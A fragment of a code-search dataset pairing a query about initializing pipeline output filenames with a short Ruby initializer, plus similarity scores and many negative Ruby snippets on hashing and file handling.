"def hash_username\n charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n Digest::SHA1.hexdigest(email + created_at.usec.to_s)\n .chars\n .each_slice(2)\n .map(&:join)\n .map { |hex| hex.to_i(16) }\n .map { |i| charset[i % charset.length] }\n .join\n .slice(0, 6)\n end",
"def generate_token\n self.perishable_token = Digest::MD5.hexdigest(\"#{Time.now}\")\n end",
"def hash(ts)\n sig = [\n Rackspace::Email::Api.configuration.user_key,\n Rackspace::Email::Api.configuration.user_agent,\n ts,\n Rackspace::Email::Api.configuration.api_key\n ].join('')\n\n Base64.encode64(Digest::SHA1.digest(sig))\n end",
"def salt!\n returning self.class.generate_salt do |s|\n write_attribute(:salt, s)\n end\n end",
"def digest\n Digest::SHA1.hexdigest(self)\n end",
"def salt\n nil\n end",
"def authenticatable_salt\n end",
"def calculate_auth_string( salt, user )\n return hash( salt, @creds[user] )\n end",
"def sha1(data)\n @connection.sha1(data)\n end",
"def encrypt(password)\n Digest::SHA1.hexdigest(\"--#{self.salt}--#{password}--\")\n end",
"def hex(string)\n Digest::SHA1.hexdigest(string)\n end",
"def unique_identifier\n Digest::SHA1.hexdigest(\"#{login_name}:#{password}\")\n end",
"def salted_hash(password)\n salt = SecureRandom.random_bytes(SALT_BYTE_SIZE)\n pbkdf2 = OpenSSL::PKCS5::pbkdf2_hmac_sha1(\n password,\n salt,\n CRYPTERATIONS,\n HASH_BYTE_SIZE)\n\n { salt: salt, pbkdf2: Base64.encode64(pbkdf2) }\n end"
] |
[
"0.80259615",
"0.8023818",
"0.77334017",
"0.75979465",
"0.7589524",
"0.7567159",
"0.7516362",
"0.75071925",
"0.74795616",
"0.74795616",
"0.7473809",
"0.7473809",
"0.74353564",
"0.72481304",
"0.7150325",
"0.7124441",
"0.70152485",
"0.70152485",
"0.7003422",
"0.6972043",
"0.69604295",
"0.69604295",
"0.6936041",
"0.6912479",
"0.6897493",
"0.6857891",
"0.68262196",
"0.6808",
"0.6798705",
"0.6795715",
"0.6782387",
"0.67667353",
"0.6703252",
"0.6703125",
"0.6694511",
"0.6680498",
"0.6664299",
"0.66639817",
"0.6657061",
"0.66326267",
"0.66326267",
"0.6588873",
"0.657849",
"0.65429866",
"0.6537917",
"0.6531597",
"0.65306234",
"0.64891136",
"0.64873385",
"0.6478277",
"0.64757675",
"0.6466719",
"0.6445445",
"0.64421964",
"0.6403914",
"0.64034814",
"0.6386826",
"0.6386826",
"0.6386826",
"0.6386826",
"0.6386826",
"0.6386826",
"0.63814163",
"0.63711375",
"0.6343197",
"0.6336318",
"0.6292608",
"0.6289016",
"0.6277434",
"0.62751323",
"0.62734497",
"0.625499",
"0.62474537",
"0.62439287",
"0.62360126",
"0.6235169",
"0.6231147",
"0.61939937",
"0.61897403",
"0.6138114",
"0.6121156",
"0.61210424",
"0.6115032",
"0.6087251",
"0.6083472",
"0.6083255",
"0.6073946",
"0.6065185",
"0.60555774",
"0.6051501",
"0.60496753",
"0.60321236",
"0.6026107",
"0.602019",
"0.6004298",
"0.6004216",
"0.6003646",
"0.59966785",
"0.5995178",
"0.5992789",
"0.59743583"
] |
0.0
|
-1
|
Default award blows up: enforce subclass impl.
|
def update
raise 'Unimplemented award type update!'
end
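A minimal sketch of the contract this guard enforces, assuming a hypothetical Award base class holding the method above and a hypothetical BlueFirst subclass (the name only echoes the set_award_type factory among the negatives below); the override body is illustrative:

class Award
  # Base class deliberately blows up so every award type must override #update.
  def update
    raise 'Unimplemented award type update!'
  end
end

class BlueFirst < Award
  # Hypothetical override: concrete expiry/quality logic would go here.
  def update
    @quality = (@quality || 0) + 1
  end
end

BlueFirst.new.update # runs the subclass implementation
Award.new.update     # raises 'Unimplemented award type update!'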
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def dispatch\n raise(NotImplemetedError, \"subclass responsability\")\n end",
"def inherited(subclass); end",
"def inherited(klass); end",
"def inherited(klass); end",
"def superclass() end",
"def inherited(base); end",
"def award; end",
"def subclass_responsibility\n raise SubclassResponsibility.exception\n end",
"def credit_account\n subclass_must_define\n end",
"def process_hook\n fail 'child class to implement'\n end",
"def abstract?; end",
"def special\n override\n end",
"def overrides; end",
"def super_class; end",
"def super_class; end",
"def base_class; end",
"def exchange\n raise \"This is an abstract class. Override exchange method in descendant class\"\n end",
"def implementation\n fail 'Subclasses must implement implementation()!'\n end",
"def verb\n raise NotImplementedError.new('Must override')\n end",
"def class Motorbike < Vehicle\r\n def wheelie\r\n end\r\nend",
"def inherited( subclass )\n\t\t\tsuper\n\t\t\tStrelka::App::Auth.extended_apps << subclass\n\t\t\tsubclass.instance_variable_set( :@auth_provider, @auth_provider )\n\t\t\tsubclass.instance_variable_set( :@positive_auth_criteria, @positive_auth_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@negative_auth_criteria, @negative_auth_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@positive_perms_criteria, @positive_perms_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@negative_perms_criteria, @negative_perms_criteria.dup )\n\t\tend",
"def awaken!\n\t\traise 'Not implemented'\n\tend",
"def abstract!; end",
"def issue(*)\n raise NotImplementedError, 'This should be defined in a subclass'\n end",
"def offer\n raise \"Unimplemented 'offer' for intention: #{self.inspect}!\"\n end",
"def super_method; end",
"def validate_options!(_options)\n raise(NotImplemetedError, \"subclass responsability\")\n end",
"def choose\n raise NotImplementedError.new('Must override')\n end",
"def award\n\tend",
"def process_hook\n fail 'sub class to implement'\n end",
"def call\n raise 'You must implement your own #call method in your subclass.'\n end",
"def failsafe_action\n super\n end",
"def abstract_class=(_arg0); end",
"def abstract_class=(_arg0); end",
"def my_fare\n\traise NotImplementedError,\n\t \"This class #{self.class.to_s} can not respond to the method::: #{__method__.to_s}\"\n end",
"def validate_subclasses\n # Validate instance methods\n if not(self.respond_to?(:scrape))\n throw Exception.new('subclass fails to implement the required scrape method')\n end\n end",
"def inherited(_sub)\n raise Error, \"cannot subclass #{self}\" unless self == Object\n end",
"def inherited(subclass)\n super\n subclass.rules.update self.rules\n end",
"def valid?\n raise Error::MethodShouldBeOverridenByExtendingClassError\n end",
"def primary_account\n subclass_must_define\n end",
"def gross\n raise NotImplementedError, \"Must implement this method in the subclass\"\n end",
"def override() # Note that despite the module.override, this still overrides\r\n puts \"CHILD override()\"\r\n end",
"def inherited( subclass )\n\t\tsuper\n\t\tStrelka::Discovery.log.info \"%p inherited by discoverable class %p\" % [ self, subclass ]\n\t\tStrelka::Discovery.add_inherited_class( subclass )\n\tend",
"def target_class\n raise NoMethodError, \"subclasses must return a class for the target (to implement #{__method__})\"\n end",
"def pickup!\n raise NotImplementedError, \"Subclasses must implemenet :pickup!\"\n end",
"def state\n throw \"must be provided by subclass\"\n end",
"def subclass_from_attributes(attrs)\n active_authorizer[:default].deny?(inheritance_column) ? nil : super\n end",
"def subclass_from_attrs(attrs)\n active_authorizer[:default].deny?(inheritance_column) ? nil : super\n end",
"def wont_be_kind_of(cls, msg=nil)\n KindAssay.refute!(self, cls, :message=>msg, :backtrace=>caller)\n end",
"def override_attr(attr, own_attr_val)\n return own_attr_val if own_attr_val\n award.send(attr) if award\n end",
"def actual_flow_control\n super\n end",
"def generate_new_item_object\n FlyError::raise_superclass_error\n end",
"def override()\n puts \"CHILD override()\"\n end",
"def commence\n raise NotImplementedError\n end",
"def calls_super # :nodoc:\n false\n end",
"def valid_upto\n fail 'sub-class to implement'\n end",
"def inherit_stuff\n return unless accepted_genus\n\n self.classification ||= accepted_genus.classification\n self.lifeform ||= accepted_genus.lifeform\n end",
"def score_player\n raise 'Method score_player cannot be called directly. It must be overridden in a child class first.'\n end",
"def subclass( & block )\n \n add_hook_context( :subclass )\n action( & block ) if block_given?\n \n return self\n\n end",
"def tag; raise 'Override this method'; end",
"def best_hand\n raise\n end",
"def wont_be_instance_of(cls, msg=nil)\n InstanceAssay.refute!(self, cls, :message=>msg, :backtrace=>caller)\n end",
"def root_type\n raise \"subclass responsibility\"\n end",
"def certain?\n fail NotImplementedError\n end",
"def ok?\n raise \"Subclasses must implement this method.\"\n end",
"def base; self; end",
"def accessibility; end",
"def set_award_type(name, expires_in, quality)\n case name\n when 'Blue First'\n BlueFirst.new(name, expires_in, quality)\n when 'Blue Distinction Plus'\n BlueDistinctionPlus.new(name, expires_in, quality)\n when 'Blue Compare'\n BlueCompare.new(name, expires_in, quality)\n when 'Blue Star'\n BlueStar.new(name, expires_in, quality)\n else\n StandardAward.new(name, expires_in, quality)\n end\n end",
"def dispatch\n raise NotImplementedError\n end",
"def invoke\r\n # TODO: rename to more appropriate one 2007/05/10 by shino\r\n raise 'must be implemented in subclasses'\r\n end",
"def generate\n throw \"override me before innocent kittens are hurt!\"\n end",
"def inherit_actions(actions = superclass.actions, exclude: [])\n\t\t\t\t(actions - exclude).each do |public_method|\n\t\t\t\t\tum = superclass.public_instance_method(public_method)\n\t\t\t\t\tdefine_method public_method, um\n\t\t\t\tend\n\t\t\tend",
"def http_method\n raise \"Implement in child class\"\n end",
"def advice\n end",
"def validate_subclasses\n # Validate instance methods\n if not(self.respond_to?(:scrape_article))\n throw Exception.new(\"subclass fails to implement the required scrape method\")\n end\n\n # Validate class methods\n if not(self.class.respond_to?(:source_name))\n throw Exception.new(\"subclass fails to provide source_name\")\n end\n\n end",
"def process\n raise \"#{self.class}: method #{__method__} must be implemented for #{@reference_action_def.to_s}.\"\n end",
"def anchored; end",
"def reject(*)\n super.tap do\n __debug_sim('USER must make change(s) to complete the submission.')\n end\n end",
"def foo(...)\n super(...)\nend",
"def inherited(klass)\n super\n klass.send :include, ::Henshin::Safety\n klass.instance_variable_set(:@unsafe_methods, @unsafe_methods)\n end",
"def import\n raise \"#{self.class.name}::#{__method__} must be overridden\"\n end",
"def superclass!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 30 )\n\n type = SUPERCLASS\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 333:4: 'superclass'\n match( \"superclass\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 30 )\n\n end",
"def validate\n fail 'sub class to implement'\n end",
"def invoke\n raise NotImplementedError, \"Author of subclass forgot to implement #invoke\"\n end",
"def errors\n raise 'Method should implemented in inherit class'\n end",
"def verify?; raise NotImplementedError; end",
"def base_operation1\n puts 'AbstractClass says: I am doing the bulk of the work'\n end",
"def policy; end",
"def playable_action\n raise NotImplementedError\n end",
"def allowed?() raise NotImplementedError end",
"def perform\n raise Errors::AbstractMethod\n end",
"def super_decl; end",
"def implementation; end",
"def implementation; end",
"def requested_flow_control\n super\n end",
"def callsign\n raise \"Not Implemented. Class #{self.class.name} doesn't implement callsign\"\n end",
"def invoke_action(opt = {})\n raise(\"Method not implemented for this class: #{@klass}\")\n end",
"def subclass_validations ; true ; end",
"def type\n raise 'derived should implement'\n end",
"def report\n raise \"Calling Abstract method report on class Heuristic.\"\n end"
] |
[
"0.6986472",
"0.63125956",
"0.6234999",
"0.6234999",
"0.6099691",
"0.6068501",
"0.60386944",
"0.5973817",
"0.5859422",
"0.58170426",
"0.57990134",
"0.5797329",
"0.57708263",
"0.5677208",
"0.5677208",
"0.56476194",
"0.56460786",
"0.5640153",
"0.5621632",
"0.5609746",
"0.559156",
"0.5583009",
"0.5578262",
"0.5573543",
"0.5559014",
"0.5528145",
"0.5508477",
"0.5496218",
"0.54542947",
"0.54400057",
"0.5436482",
"0.5424004",
"0.54111284",
"0.54111284",
"0.5409784",
"0.54083925",
"0.5404082",
"0.53915817",
"0.53603226",
"0.53574157",
"0.5355847",
"0.53545254",
"0.5343667",
"0.53435636",
"0.53346825",
"0.53289485",
"0.53272694",
"0.5324593",
"0.53061587",
"0.5285719",
"0.52826047",
"0.52750564",
"0.5267724",
"0.52627516",
"0.52615887",
"0.52511036",
"0.5247333",
"0.5239209",
"0.5228788",
"0.52285",
"0.5207243",
"0.52060574",
"0.52053297",
"0.51999736",
"0.519847",
"0.51862764",
"0.51836026",
"0.5179106",
"0.51671106",
"0.51621705",
"0.51577985",
"0.5153708",
"0.5150565",
"0.51491714",
"0.51470274",
"0.51387477",
"0.51283973",
"0.51256305",
"0.51248896",
"0.511693",
"0.51165724",
"0.51156104",
"0.5101484",
"0.5098",
"0.5094795",
"0.5092383",
"0.5091665",
"0.5077972",
"0.50768024",
"0.5071521",
"0.5066728",
"0.50641227",
"0.5058256",
"0.5058256",
"0.50576067",
"0.50554913",
"0.50536865",
"0.50519675",
"0.5046227",
"0.50421447"
] |
0.6176183
|
4
|
Initializes all output filenames and folders for later use. names: object of class Filename; contains filenames & folders. force_overwrite: if true, pipeline will overwrite all existing files. Returns nothing.
|
def initialize(names, force_overwrite)
@names = names
@force_overwrite = force_overwrite
end
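A usage sketch under stated assumptions: the initializer is presumed to sit in a pipeline class (called Pipeline here purely for illustration), and names may be any object bundling the output paths, since the constructor only stores its two arguments:

# Hypothetical stand-in for the Filename class the query describes.
Names = Struct.new(:log_file, :result_file)

class Pipeline # illustrative host for the initializer above
  def initialize(names, force_overwrite)
    @names = names
    @force_overwrite = force_overwrite
  end
end

names = Names.new('run.log', 'results.tsv')
Pipeline.new(names, true) # force_overwrite: existing outputs will be replaced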
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def output_files\n @output_files ||= Fileset.new()\n end",
"def output_files\n @output_files ||= Fileset.new\n end",
"def output_files\n @output_files ||= Fileset.new\n end",
"def create_output_files\n return unless @option_output_path\n return if @collected_nodes.empty?\n @collected_nodes.each do |certname, properties|\n next if properties['settings'].empty?\n output_file = \"#{@option_output_path}/nodes/#{certname}.yaml\"\n File.write(output_file, properties['settings'].to_yaml)\n output(\"## Wrote Hiera YAML file: #{output_file}\\n\\n\")\n end\n return if @common_settings.empty?\n output_file = \"#{@option_output_path}/common.yaml\"\n File.write(output_file, @common_settings.to_yaml)\n end",
"def initialize_output_directory()\n require 'fileutils'\n FileUtils.mkdir_p(OUTPUT_DIRECTORY)\n end",
"def prepare\n FileUtils.rm_rf(output_dir)\n FileUtils.mkdir_p(output_dir)\n end",
"def prepare\n FileUtils.rm_rf(output_dir)\n FileUtils.mkdir_p(output_dir)\n end",
"def output_files\n @output_files ||= to_file(@args.output)\n end",
"def gen_sub_directories\n @outputdir.mkpath\n end",
"def create_output_file filename # :yields: complete_filename\n output_path = @output_root + filename\n @logger.info \"Writing to #{output_path}#{dry_run ? \" (skipped - dry run)\" : \"\"}\" do\n unless dry_run\n folder = output_path.dirname\n folder.mkpath unless folder.directory?\n yield output_path\n end\n end\n end",
"def init_files(input, output)\n can_read?(input)\n\n @output_file = prepare_write_file(output)\n @error_file = prepare_write_file(ERROR_FILE)\n\n @output_file << LineParser::RESULT_HEADER.to_csv\n @error_file << LineParser::ERROR_HEADER.to_csv\n end",
"def process()\n @file_info = FileInfoFile.new(@file_info_file)\n @namespace = @file_info.default_namespace\n \n namespaces_file = NamespacesFile.new(@uploads_directory, @scan_only)\n namespaces_file.add_namespace(@namespace)\n namespaces_file.write()\n @prefix = namespaces_file.prefix(@namespace)\n \n create_image_files_where_needed()\n end",
"def gen_sub_directories\n\t\t@outputdir.mkpath\n\tend",
"def gen_sub_directories\n\t\t@outputdir.mkpath\n\tend",
"def generate(output_folder, types, version_name)\n generate_objects(output_folder, types, version_name)\n copy_files(output_folder) \\\n unless @config.files.nil? || @config.files.copy.nil?\n compile_examples(output_folder) unless @config.examples.nil?\n compile_changelog(output_folder) unless @config.changelog.nil?\n # Compilation has to be the last step, as some files (e.g.\n # CONTRIBUTING.md) may depend on the list of all files previously copied\n # or compiled.\n compile_files(output_folder, version_name) \\\n unless @config.files.nil? || @config.files.compile.nil?\n\n generate_datasources(output_folder, types, version_name) \\\n unless @config.datasources.nil?\n apply_file_acls(output_folder) \\\n unless @config.files.nil? || @config.files.permissions.nil?\n end",
"def defaults\n {\n filename: 'out',\n timestamp: false,\n write_file: true,\n }\n end",
"def generate_data_files\n files = {}\n\n # extracted data\n @classes.each do |category|\n files[category] = {}\n folder = File.join(@res, 'data', category.to_s, 'extracted')\n\n files[category][:extracted] = File.join(folder, \"#{category}.json\")\n end\n\n # divided data\n @classes.each do |category|\n files[category][:divided] = {}\n folder = File.join(@res, 'data', category.to_s, 'divided')\n\n @subsets.each do |subset|\n files[category][:divided][subset] = File.join(folder,\n \"#{category}_#{subset}.json\")\n end\n end\n\n # preprocessed data\n @classes.each do |category|\n files[category][:preprocessed] = {}\n\n @preproc.each do |preprocess|\n folder = File.join(\n @res, 'data', category.to_s, 'preprocessed', preprocess.to_s)\n\n files[category][:preprocessed][preprocess] = {}\n\n @subsets.each do |subset|\n files[category][:preprocessed][preprocess][subset] = File.join(\n folder, \"#{category}_#{subset}.json\")\n end\n end\n end\n\n # transformed data\n if @trans.size > 0\n @classes.each do |category|\n files[category][:transformed] = {}\n\n @trans.each do |transformation|\n @preproc.each do |preprocess|\n ctrans = :\"#{transformation}_#{preprocess}\"\n\n folder = File.join(\n @res, 'data', category.to_s, 'transformed', ctrans.to_s)\n\n files[category][:transformed][ctrans] = {}\n\n @subsets.each do |subset|\n files[category][:transformed][ctrans][subset] = File.join(\n folder, \"#{category}_#{subset}.json\")\n end\n end\n end\n end\n end\n\n # classified data\n if @classifs.size > 0\n @classes.each do |category|\n files[category][:classified] = {}\n\n @classifs.each do |classifier|\n @trans.each do |transformation|\n @preproc.each do |preprocess|\n ctrans = :\"#{classifier}_#{transformation}_#{preprocess}\"\n\n folder = File.join(\n @res, 'data', category.to_s, 'classified', ctrans.to_s)\n\n files[category][:classified][ctrans] = {}\n\n @subsets.each do |subset|\n files[category][:classified][ctrans][subset] = File.join(\n folder, \"#{category}_#{subset}.json\")\n end\n end\n end\n end\n end\n end\n files\n end",
"def createFileNameArr\n # Build Mirror Array of Filenames\n @fileNameArr.each do |filename|\n filename.gsub!(\" \", \"-\")\n end\n\n end",
"def prepare\r\n # if output_dir is not specified, output in the same directory\r\n # as the imput file\r\n @output_dir = File.dirname(@input_file) if !@output_dir && @input_file\r\n\r\n if /.bz2$/ =~ @input_file\r\n if @bz2_gem\r\n file = Bzip2::Reader.new File.open(@input_file, \"r:UTF-8\")\r\n elsif Gem.win_platform?\r\n file = IO.popen(\"bunzip2.exe -c #{@input_file}\")\r\n elsif (bzpath = command_exist?(\"lbzip2\") || command_exist?(\"pbzip2\") || command_exist?(\"bzip2\"))\r\n file = IO.popen(\"#{bzpath} -c -d #{@input_file}\")\r\n end\r\n else # meaning that it is a text file\r\n @infile_size = File.stat(@input_file).size\r\n file = open(@input_file)\r\n end\r\n\r\n # create basename of output file\r\n @outfile_base = File.basename(@input_file, \".*\") + \"-\"\r\n @total_size = 0\r\n @file_index = 1\r\n outfilename = File.join(@output_dir, @outfile_base + @file_index.to_s)\r\n @outfiles = []\r\n @outfiles << outfilename\r\n @fp = File.open(outfilename, \"w\")\r\n @file_pointer = file\r\n true\r\n end",
"def initialize(output_file)\n @output_file = output_file\n @folders = []\n end",
"def populate_output_path(options = {})\n base = Pathname.new(@source_path).basename.to_s\n if options.empty?\n result = base\n else\n name, ext = *base.split(\".\")\n if options[:output_path].nil? || File.directory?(options[:output_path])\n tokens = \"\"\n MODULES.each do |mod|\n token = mod.filename_token(options)\n tokens += \"-#{token}\" unless token.nil?\n end\n result = options[:output_path].nil? ? \"\" : \"#{options[:output_path].to_s}/\"\n result += \"#{name}#{tokens}.#{ext}\"\n elsif !options[:output_path].nil?\n result = \"#{options[:output_path].to_s}.#{ext}\"\n end\n end\n @path = Pathname.new(result)\n end",
"def prepareDirectory( outputfn )\n scriptpath = File.dirname __FILE__\n cf = File.join scriptpath, \"conversion_files\"\n i = 0 \n max = 3\n\n print \"#\"*40, \"\\n\", \"Preparing Directory\\n\", \"#\"*40, \"\\n\\n\"\n\n phasePrint \"Create Base Folder / Check Dependencies\", i+=1, max\n # Make our base directory\n if not Dir.exists? outputfn\n FileUtils.mkdir_p outputfn\n end\n\n # See if our conversion_files folder exists, this is required\n if not Dir.exists? cf \n error \"Missing conversion_files folder:\\n#{cf}\\n\\nThe conversion process cannot continue.\"\n return nil\n end\n\n # Check for the python cache extracted folder\n if not Dir.exists? File.join( cf, \"python27\" ) and $options[:python]\n if not File.exists? cf+\"python27.zip\"\n error \"Missing packaged Python 2.7.8 installation folder or zip in conversion_files, this is required for the \\\"Include Python\\\"//\\\"--python\\\" option.\\n\\nThe conversion process cannot continue.\"\n return nil\n else\n # Extract our python27.zip folder\n phasePrint \"Extracting Python\", i+=0.5, max\n error \"Extracting python27.zip, this may take some time.\\n\\nIt is quicker to extract this by hand into the conversion_files folder using 7-zip or Peazip, as they are capable of using multiple cores.\"\n unzip \"#{cf}python27.zip\", cf\n end\n end\n\n i = i.floor if i.is_a? Float\n phasePrint \"Copying Python to Output Folder\", i+=1, max\n print \" This will take some time\\n\"\n # Copy Python over to the directory\n if not Dir.exists? File.join( outputfn, \"python27\" ) and $options[:python]\n FileUtils.cp_r File.join( cf, \"python27\" ), outputfn\n end\n\n phasePrint \"Initializing File Structure\", i+=1, max\n FileUtils.cp File.join( cf, \"run.bat\" ), outputfn\n\n FileUtils.cp_r File.join( cf, \"includes\" ), outputfn\n\n return File.new( File.join( outputfn, \"run_test.py\" ), \"w+:UTF-8\" )\nend",
"def created_mp3s(splitter = @splitter)\n Dir.glob(\"#{splitter.output_folder}/*.mp3\").map { |f| File.basename f }\nend",
"def make_files(targets)\n file_pairs = targets.map { |t| \n filename = sanitize_filename(t[:data][:name] + '.json')\n [filename, t]\n }\n unique_pairs = uniqufy(file_pairs)\n unique_pairs.each do |name, content| \n puts \"Write #{File.absolute_path(name)}\"\n File.open(name, 'w') { |file| file.write(JSON.pretty_generate(content)) }\n end\nend",
"def write\n make_parent_directory\n generate_file\n end",
"def setup_filesystem\n FileUtils.mkdir_p($out_pth)\n FileUtils.mkdir_p($log_dir)\n end",
"def initialize(folder1, folder2, options)\n \t @folder1 = folder1\n \t @folder2 = folder2\n \t @format = options['output']\n \t @filehash = Hash.new\n\t\t\t validate\n\t\tend",
"def generate_flux_input_files\n # At the moment we must use subfolders\n for i in 0...n_flux_tubes\n #gs2run = gs2_run(:base).dup\n #gs2_run(i).instance_variables.each do |var|\n #gs2run.instance_variable_set(var, gs2_run(i).instance_variable_get(var))\n #end\n fluxrun = flux_runs[i]\n #ep ['gs2_runs[i] in generate', gs2_runs[i].nwrite]\n #p ['i',i]\n #if i >= n_flux_tubes_jac\n #jn = i - n_flux_tubes_jac + 1\n #run_name = \"calibrate_\" + @run_name + (jn).to_s\n #folder = \"calibrate_#{jn}\"\n #else\n #jn = i + 1\n #run_name = @run_name + (jn).to_s\n #folder = \"flux_tube_#{jn}\"\n #end\n\n folder = flux_folder_name(i)\n run_name = flux_run_name(i)\n\n if @subfolders and @subfolders.fortran_true?\n fluxrun.directory = @directory + \"/\" + folder\n FileUtils.makedirs(fluxrun.directory)\n fluxrun.relative_directory = @relative_directory + \"/\" + folder\n fluxrun.restart_dir = fluxrun.directory + \"/nc\"\n else\n fluxrun.directory = @directory\n fluxrun.relative_directory = @relative_directory\n end\n fluxrun.run_name = run_name\n fluxrun.nprocs = @nprocs\n if i==0\n block = Proc.new{check_parameters}\n else\n block = Proc.new{}\n end\n #if @restart_id\n #gs2run.restart_id =\n Dir.chdir(fluxrun.directory) do\n fluxrun.generate_input_file(&block)\n fluxrun.write_info\n end\n\n ### Hack the input file so that gs2 gets the location of\n # the restart dir correctly within trinity\n if @subfolders and @subfolders.fortran_true? \n infile = fluxrun.directory + \"/\" + fluxrun.run_name + \".in\"\n text = File.read(infile)\n File.open(infile, 'w'){|f| f.puts text.sub(/restart_dir\\s*=\\s*\"nc\"/, \"restart_dir = \\\"#{folder}/nc\\\"\")}\n end\n end\n end",
"def generate_unique_filename\n name = options[:file_name] || wrapper.name\n # TODO: Sanitize the file name\n\n filename = \"#{name}.swatches\"\n\n related_files = related_file_indexes(filename)\n\n filename = if related_files.present?\n \"#{name}-#{related_files.max + 1}#{SWATCHES_EXTENSION}\"\n else\n \"#{name}#{SWATCHES_EXTENSION}\"\n end\n\n @swatches_path = File.join(options[:export_directory], filename)\n end",
"def all_filenames\n\n\n # This checks for it being an array and not nil!\n # return @filenames if @filenames && !@filenames.empty?\n\n # This means we can add files to the output\n return $filenames if $filenames && $filenames.size > 5 # I guess that small numbers are errors too\n \n if @directory\n @output_directory ||= File.join(@directory, 'Build')\n $filenames = Dir.glob(File.join(@directory, \"**/*\")).map {|file|\n next if file.start_with?(@output_directory)\n next if File.directory?(file)\n file.gsub(@directory+\"/\", \"\")\n }.compact\n else\n []\n end\n end",
"def keep_files=(_arg0); end",
"def generate_file_list\n self.file_list = Concurrent::Array.new\n targets.each do |target|\n add_target(target)\n end\n end",
"def output_files\n get_info :output_files\n end",
"def generate_filename\n #if episodeTitle != brandTitle (brandTitle looks to be the name of the program) then use this in the filename\n if @metadata[:episodeTitle] != @metadata[:brandTitle]\n out_file = \"#{@metadata[:title1]}__#{@metadata[:title2]}__#{@metadata[:episodeTitle]}\"\n else #otherwise just use title1/2\n out_file = \"#{@metadata[:title1]}__#{@metadata[:title2]}\"\n end\n out_file.gsub!(/[^0-9A-Za-z.\\-]/, '_') #replace non alphanumerics with underscores\n\n @out_file = File.join(@out_dir, out_file)\n end",
"def existing_files; end",
"def sort_out_output_directories \n FileUtils.mkdir_p(output_directory)\n FileUtils.mkdir_p(xml_directory)\n FileUtils.mkdir_p(intermediate_directory) unless run_in_memory\n end",
"def imagepipeline\n # delete non-image files\n images = Dir.entries(@from_dir).delete_if do |file|\n (file =~ /\\w+\\.(jpg|jpeg)/) == nil\n end\n images.each do |file|\n yield File.join(@from_dir,file), File.join(@to_dir,file)\n end\n end",
"def initialize(name)\n self.original_filename = name\n self.root_dir = controll_root\n clean_tmpdir\n #creo una nuova cartella per il file attuale\n self.tmp_dir = \"#{self.root_dir.path}/#{Time.now.to_f}\"\n Dir.mkdir(self.tmp_dir)\n ext = File.extname(name)\n name = [File.basename(name), ext] unless ext.blank?\n\n @tmp_file = Tempfile.create(name, self.tmp_dir)\n\n self.unique_filename= File.basename(self.path)\n end",
"def initialize(info, prefix_dir) \r\n @info_dictionary = info\r\n @files = Array.new\r\n @piece_files = Array.new\r\n @pieceLength = info[\"piece length\"]\r\n @numBytes = 0\r\n @totalPieces = info[\"pieces\"].bytesize / 20\r\n \r\n build_dir_path(prefix_dir)\r\n \r\n unless prefix_dir.chars.last == File::SEPARATOR \r\n prefix_dir += File::SEPARATOR \r\n end\r\n \r\n no_files_existed = true\r\n if info[\"files\"] != nil\r\n # multiple file mode\r\n \r\n unless Dir.exists?(prefix_dir + info[\"name\"])\r\n Dir.mkdir(prefix_dir + info[\"name\"])\r\n end\r\n \r\n info[\"files\"].each { |file|\r\n @numBytes += file[\"length\"]\r\n filename = file[\"path\"].last\r\n \r\n build_dir = prefix_dir + info[\"name\"] + File::SEPARATOR # for making directory trees\r\n file[\"path\"].rotate(-1).drop(1).each { |dir| # don't use filename (last element)\r\n build_dir += (dir + File::SEPARATOR) # use constant separator for portability\r\n unless Dir.exists?(build_dir)\r\n Dir.mkdir(build_dir)\r\n end\r\n }\r\n \r\n if File.exists?(build_dir + filename)\r\n no_files_existed = false\r\n end\r\n @files << [File.open(build_dir + filename, File::RDWR | File::CREAT), file[\"length\"]]\r\n if @files.last[0].size < @files.last[1]\r\n @files.last[0].seek(@files.last[0].size, IO::SEEK_SET)\r\n @files.last[0].write(\"\\0\" * (@files.last[1] - @files.last[0].size))\r\n end\r\n }\r\n else\r\n # single file mode\r\n @numBytes = info[\"length\"] \r\n if File.exists?(prefix_dir + info[\"name\"])\r\n no_files_existed = false\r\n end\r\n @files << [File.open(prefix_dir + info[\"name\"], File::RDWR | File::CREAT), info[\"length\"]]\r\n if @files.last[0].size < @files.last[1] # still needs to be checked even if file exists\r\n @files.last[0].seek(@files.last[0].size, IO::SEEK_SET)\r\n (0..((@files.last[1] - @files.last[0].size)/1024)).each {\r\n @files.last[0].write(\"\\0\" * 1024)\r\n }\r\n end\r\n end\r\n unless no_files_existed\r\n recheckComplete()\r\n else\r\n gen_initial_states()\r\n end\r\n \r\n #puts @bitfield.to_binary_string\r\n end",
"def initialize(*args)\n parse_params(*args)\n files = args.each_with_object([]) { |a, o| o << Dir[a.to_s] }\n @files = files.flatten.sort.uniq\n end",
"def setup_outputs_for(input_file_path)\n file_name_without_extension = File.basename(input_file_path, '.*')\n outputs = (exporters || Tracksperanto.exporters).map do | exporter_class |\n export_name = [file_name_without_extension, exporter_class.desc_and_extension].join(\"_\")\n export_path = File.join(File.dirname(input_file_path), export_name)\n exporter_class.new(open_owned_export_file(export_path))\n end\n \n Tracksperanto::Export::Mux.new(outputs)\n end",
"def replaced_files; end",
"def initialize\n @files = []\n end",
"def create_work\n @files.each do |file|\n executor.queue { file.copy_file(@output_dir) }\n end\n end",
